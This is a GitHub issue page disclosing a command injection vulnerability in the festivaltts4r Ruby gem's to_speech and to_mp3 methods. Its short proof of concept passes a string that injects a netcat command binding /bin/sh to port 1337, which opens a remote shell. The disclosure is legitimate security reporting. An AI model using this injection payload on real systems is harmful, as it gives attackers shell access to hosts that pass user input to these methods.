Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
The to_speech and to_mp3 methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.
to_speech
to_mp3
Proof of concept:
#!/usr/bin/env ruby require "rubygems" require "festivaltts4r" '";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech '";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')
$ ./asdf.rb listening on [any] 1337 ...
The text was updated successfully, but these errors were encountered:
No branches or pull requests
The
to_speechandto_mp3methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.Proof of concept:
The text was updated successfully, but these errors were encountered: